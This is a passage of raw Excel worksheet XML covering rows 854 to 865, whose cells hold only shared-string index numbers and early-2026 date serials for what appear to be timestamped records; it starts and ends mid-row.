      <c r="U854" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V854" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W854" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X854" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y854" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z854" s="24">
        <v>46077.6243055556</v>
      </c>
      <c r="AA854" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB854" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC854" s="23"/>
      <c r="AD854" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE854" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF854" s="23"/>
      <c r="AG854" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH854" s="24">
        <v>46077.6243402778</v>
      </c>
      <c r="AI854" s="23"/>
      <c r="AJ854" s="23"/>
      <c r="AK854" s="23"/>
      <c r="AL854" s="23"/>
      <c r="AM854" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN854" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO854" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP854" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ854" s="24">
        <v>46077.6451388889</v>
      </c>
      <c r="AR854" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS854" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT854" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU854" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="855" s="1" customFormat="1" spans="1:47">
      <c r="A855" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B855" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C855" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D855" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E855" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F855" s="23" t="s">
        <v>10017</v>
      </c>
      <c r="G855" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H855" s="23"/>
      <c r="I855" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J855" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K855" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L855" s="24">
        <v>46077.6206481481</v>
      </c>
      <c r="M855" s="24">
        <v>46077.6206481481</v>
      </c>
      <c r="N855" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O855" s="23"/>
      <c r="P855" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q855" s="23"/>
      <c r="R855" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S855" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T855" s="23"/>
      <c r="U855" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V855" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W855" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X855" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y855" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z855" s="24">
        <v>46077.6214814815</v>
      </c>
      <c r="AA855" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB855" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC855" s="23"/>
      <c r="AD855" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE855" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF855" s="23"/>
      <c r="AG855" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH855" s="24">
        <v>46077.6215162037</v>
      </c>
      <c r="AI855" s="23"/>
      <c r="AJ855" s="23"/>
      <c r="AK855" s="23"/>
      <c r="AL855" s="23"/>
      <c r="AM855" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN855" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO855" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP855" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ855" s="24">
        <v>46077.6423148148</v>
      </c>
      <c r="AR855" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS855" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT855" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU855" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="856" s="1" customFormat="1" spans="1:47">
      <c r="A856" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B856" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C856" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D856" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E856" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F856" s="23" t="s">
        <v>10018</v>
      </c>
      <c r="G856" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H856" s="23"/>
      <c r="I856" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J856" s="23" t="s">
        <v>9915</v>
      </c>
      <c r="K856" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L856" s="24">
        <v>46077.6016435185</v>
      </c>
      <c r="M856" s="24">
        <v>46077.6081365741</v>
      </c>
      <c r="N856" s="23"/>
      <c r="O856" s="23"/>
      <c r="P856" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q856" s="23"/>
      <c r="R856" s="23" t="s">
        <v>10019</v>
      </c>
      <c r="S856" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T856" s="23"/>
      <c r="U856" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V856" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W856" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X856" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y856" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z856" s="24">
        <v>46077.6019560185</v>
      </c>
      <c r="AA856" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB856" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC856" s="23"/>
      <c r="AD856" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE856" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF856" s="23"/>
      <c r="AG856" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH856" s="24">
        <v>46077.6019675926</v>
      </c>
      <c r="AI856" s="23"/>
      <c r="AJ856" s="23"/>
      <c r="AK856" s="23"/>
      <c r="AL856" s="23"/>
      <c r="AM856" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN856" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO856" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP856" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ856" s="24">
        <v>46077.6227893519</v>
      </c>
      <c r="AR856" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS856" s="23"/>
      <c r="AT856" s="23"/>
      <c r="AU856" s="23"/>
    </row>
    <row r="857" s="1" customFormat="1" spans="1:47">
      <c r="A857" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B857" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C857" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D857" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E857" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F857" s="23" t="s">
        <v>10020</v>
      </c>
      <c r="G857" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H857" s="23"/>
      <c r="I857" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J857" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K857" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L857" s="24">
        <v>46077.3602314815</v>
      </c>
      <c r="M857" s="24">
        <v>46077.5648726852</v>
      </c>
      <c r="N857" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O857" s="23"/>
      <c r="P857" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q857" s="23"/>
      <c r="R857" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S857" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T857" s="23"/>
      <c r="U857" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V857" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W857" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X857" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y857" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z857" s="24">
        <v>46077.3611111111</v>
      </c>
      <c r="AA857" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB857" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC857" s="23"/>
      <c r="AD857" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE857" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF857" s="23"/>
      <c r="AG857" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH857" s="24">
        <v>46077.3611574074</v>
      </c>
      <c r="AI857" s="23"/>
      <c r="AJ857" s="23"/>
      <c r="AK857" s="23"/>
      <c r="AL857" s="23"/>
      <c r="AM857" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN857" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO857" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP857" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ857" s="24">
        <v>46077.3819444444</v>
      </c>
      <c r="AR857" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS857" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT857" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU857" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="858" s="1" customFormat="1" spans="1:47">
      <c r="A858" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B858" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C858" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D858" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E858" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F858" s="23" t="s">
        <v>10021</v>
      </c>
      <c r="G858" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H858" s="23"/>
      <c r="I858" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J858" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K858" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L858" s="24">
        <v>46077.4866319444</v>
      </c>
      <c r="M858" s="24">
        <v>46077.4962847222</v>
      </c>
      <c r="N858" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O858" s="23"/>
      <c r="P858" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q858" s="23"/>
      <c r="R858" s="23" t="s">
        <v>10022</v>
      </c>
      <c r="S858" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T858" s="23"/>
      <c r="U858" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V858" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W858" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X858" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y858" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z858" s="24">
        <v>46077.4868518518</v>
      </c>
      <c r="AA858" s="23"/>
      <c r="AB858" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC858" s="23"/>
      <c r="AD858" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE858" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF858" s="23"/>
      <c r="AG858" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH858" s="24">
        <v>46077.4868865741</v>
      </c>
      <c r="AI858" s="23"/>
      <c r="AJ858" s="23"/>
      <c r="AK858" s="23"/>
      <c r="AL858" s="23"/>
      <c r="AM858" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN858" s="23"/>
      <c r="AO858" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP858" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ858" s="24">
        <v>46077.5076851852</v>
      </c>
      <c r="AR858" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS858" s="23"/>
      <c r="AT858" s="23"/>
      <c r="AU858" s="23"/>
    </row>
    <row r="859" s="1" customFormat="1" spans="1:47">
      <c r="A859" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B859" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C859" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D859" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E859" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F859" s="23" t="s">
        <v>10023</v>
      </c>
      <c r="G859" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H859" s="23"/>
      <c r="I859" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J859" s="23" t="s">
        <v>9915</v>
      </c>
      <c r="K859" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L859" s="24">
        <v>46077.4588888889</v>
      </c>
      <c r="M859" s="24">
        <v>46077.4749537037</v>
      </c>
      <c r="N859" s="23"/>
      <c r="O859" s="23"/>
      <c r="P859" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q859" s="23"/>
      <c r="R859" s="23" t="s">
        <v>9764</v>
      </c>
      <c r="S859" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T859" s="23"/>
      <c r="U859" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V859" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W859" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X859" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y859" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z859" s="24">
        <v>46077.4590856481</v>
      </c>
      <c r="AA859" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB859" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC859" s="23"/>
      <c r="AD859" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE859" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF859" s="23"/>
      <c r="AG859" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH859" s="24">
        <v>46077.4591203704</v>
      </c>
      <c r="AI859" s="23"/>
      <c r="AJ859" s="23"/>
      <c r="AK859" s="23"/>
      <c r="AL859" s="23"/>
      <c r="AM859" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN859" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO859" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP859" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ859" s="24">
        <v>46077.4799189815</v>
      </c>
      <c r="AR859" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS859" s="23"/>
      <c r="AT859" s="23"/>
      <c r="AU859" s="23"/>
    </row>
    <row r="860" s="1" customFormat="1" spans="1:47">
      <c r="A860" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B860" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C860" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D860" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E860" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F860" s="23" t="s">
        <v>10024</v>
      </c>
      <c r="G860" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H860" s="23"/>
      <c r="I860" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J860" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K860" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L860" s="24">
        <v>46077.4697337963</v>
      </c>
      <c r="M860" s="24">
        <v>46077.4697337963</v>
      </c>
      <c r="N860" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O860" s="23"/>
      <c r="P860" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q860" s="23"/>
      <c r="R860" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S860" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T860" s="23"/>
      <c r="U860" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V860" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W860" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X860" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y860" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z860" s="24">
        <v>46077.470625</v>
      </c>
      <c r="AA860" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB860" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC860" s="23"/>
      <c r="AD860" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE860" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF860" s="23"/>
      <c r="AG860" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH860" s="24">
        <v>46077.4706481481</v>
      </c>
      <c r="AI860" s="23"/>
      <c r="AJ860" s="23"/>
      <c r="AK860" s="23"/>
      <c r="AL860" s="23"/>
      <c r="AM860" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN860" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO860" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP860" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ860" s="24">
        <v>46077.4914583333</v>
      </c>
      <c r="AR860" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS860" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT860" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU860" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="861" s="1" customFormat="1" spans="1:47">
      <c r="A861" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B861" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C861" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="D861" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E861" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F861" s="23" t="s">
        <v>10025</v>
      </c>
      <c r="G861" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H861" s="23"/>
      <c r="I861" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J861" s="23" t="s">
        <v>9372</v>
      </c>
      <c r="K861" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L861" s="24">
        <v>46077.448587963</v>
      </c>
      <c r="M861" s="24">
        <v>46077.4531828704</v>
      </c>
      <c r="N861" s="23"/>
      <c r="O861" s="23"/>
      <c r="P861" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q861" s="23"/>
      <c r="R861" s="23" t="s">
        <v>10026</v>
      </c>
      <c r="S861" s="23" t="s">
        <v>1711</v>
      </c>
      <c r="T861" s="23"/>
      <c r="U861" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V861" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W861" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X861" s="23" t="s">
        <v>8471</v>
      </c>
      <c r="Y861" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z861" s="24">
        <v>46077.4489351852</v>
      </c>
      <c r="AA861" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB861" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC861" s="23"/>
      <c r="AD861" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE861" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF861" s="23"/>
      <c r="AG861" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH861" s="24">
        <v>46077.4489467593</v>
      </c>
      <c r="AI861" s="23"/>
      <c r="AJ861" s="23"/>
      <c r="AK861" s="23"/>
      <c r="AL861" s="23"/>
      <c r="AM861" s="23" t="s">
        <v>8463</v>
      </c>
      <c r="AN861" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO861" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP861" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ861" s="24">
        <v>46077.4697685185</v>
      </c>
      <c r="AR861" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS861" s="23"/>
      <c r="AT861" s="23"/>
      <c r="AU861" s="23"/>
    </row>
    <row r="862" s="1" customFormat="1" spans="1:47">
      <c r="A862" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B862" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C862" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D862" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E862" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F862" s="23" t="s">
        <v>10027</v>
      </c>
      <c r="G862" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H862" s="23"/>
      <c r="I862" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J862" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K862" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L862" s="24">
        <v>46077.4471643519</v>
      </c>
      <c r="M862" s="24">
        <v>46077.4471643519</v>
      </c>
      <c r="N862" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O862" s="23"/>
      <c r="P862" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q862" s="23"/>
      <c r="R862" s="23" t="s">
        <v>8498</v>
      </c>
      <c r="S862" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T862" s="23"/>
      <c r="U862" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V862" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W862" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X862" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y862" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z862" s="24">
        <v>46077.4509143519</v>
      </c>
      <c r="AA862" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB862" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC862" s="23"/>
      <c r="AD862" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE862" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF862" s="23"/>
      <c r="AG862" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH862" s="24">
        <v>46077.4509375</v>
      </c>
      <c r="AI862" s="23"/>
      <c r="AJ862" s="23"/>
      <c r="AK862" s="23"/>
      <c r="AL862" s="23"/>
      <c r="AM862" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN862" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO862" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP862" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ862" s="24">
        <v>46077.4717476852</v>
      </c>
      <c r="AR862" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS862" s="23"/>
      <c r="AT862" s="23"/>
      <c r="AU862" s="23"/>
    </row>
    <row r="863" s="1" customFormat="1" spans="1:47">
      <c r="A863" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B863" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C863" s="23" t="s">
        <v>8909</v>
      </c>
      <c r="D863" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E863" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F863" s="23" t="s">
        <v>10028</v>
      </c>
      <c r="G863" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H863" s="23"/>
      <c r="I863" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J863" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K863" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L863" s="24">
        <v>46077.4122569444</v>
      </c>
      <c r="M863" s="24">
        <v>46077.4122569444</v>
      </c>
      <c r="N863" s="23"/>
      <c r="O863" s="23"/>
      <c r="P863" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q863" s="23"/>
      <c r="R863" s="23" t="s">
        <v>8909</v>
      </c>
      <c r="S863" s="23" t="s">
        <v>8621</v>
      </c>
      <c r="T863" s="23"/>
      <c r="U863" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V863" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W863" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X863" s="23" t="s">
        <v>8658</v>
      </c>
      <c r="Y863" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z863" s="24">
        <v>46077.413125</v>
      </c>
      <c r="AA863" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB863" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC863" s="23"/>
      <c r="AD863" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE863" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF863" s="23"/>
      <c r="AG863" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH863" s="24">
        <v>46077.4131481481</v>
      </c>
      <c r="AI863" s="23"/>
      <c r="AJ863" s="23"/>
      <c r="AK863" s="23"/>
      <c r="AL863" s="23"/>
      <c r="AM863" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN863" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO863" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP863" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ863" s="24">
        <v>46077.4339583333</v>
      </c>
      <c r="AR863" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS863" s="23"/>
      <c r="AT863" s="23"/>
      <c r="AU863" s="23"/>
    </row>
    <row r="864" s="1" customFormat="1" spans="1:47">
      <c r="A864" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B864" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C864" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D864" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E864" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F864" s="23" t="s">
        <v>10029</v>
      </c>
      <c r="G864" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H864" s="23"/>
      <c r="I864" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J864" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K864" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L864" s="24">
        <v>46077.4122569444</v>
      </c>
      <c r="M864" s="24">
        <v>46077.4122569444</v>
      </c>
      <c r="N864" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O864" s="23"/>
      <c r="P864" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q864" s="23"/>
      <c r="R864" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S864" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T864" s="23"/>
      <c r="U864" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V864" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W864" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X864" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y864" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z864" s="24">
        <v>46077.4130902778</v>
      </c>
      <c r="AA864" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB864" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC864" s="23"/>
      <c r="AD864" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE864" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF864" s="23"/>
      <c r="AG864" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH864" s="24">
        <v>46077.4131134259</v>
      </c>
      <c r="AI864" s="23"/>
      <c r="AJ864" s="23"/>
      <c r="AK864" s="23"/>
      <c r="AL864" s="23"/>
      <c r="AM864" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN864" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO864" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP864" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ864" s="24">
        <v>46077.4339236111</v>
      </c>
      <c r="AR864" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS864" s="23" t="s">
        <v>9833</v>
      </c>
      <c r="AT864" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="AU864" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="865" s="1" customFormat="1" spans="1:47">
      <c r="A865" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B865" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C865" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D865" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E865" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F865" s="23" t="s">
        <v>10030</v>
      </c>
      <c r="G865" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H865" s="23"/>
      <c r="I865" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J865" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K865" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L865" s="24">
        <v>46077.3877662037</v>
      </c>
      <c r="M865" s="24">
        <v>46077.3877662037</v>
      </c>
      <c r="N865" s="23" t="s">
        <v>8424</v>
      </c>
      <c r="O865" s="23"/>
      <c r="P865" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q865" s="23"/>
      <c r="R865" s="23" t="s">
        <v>1698</v>
      </c>
      <c r="S865" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T865" s="23"/>
      <c r="U865" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V865" s="23" t="s">
        <v>8388</v>
      </c>
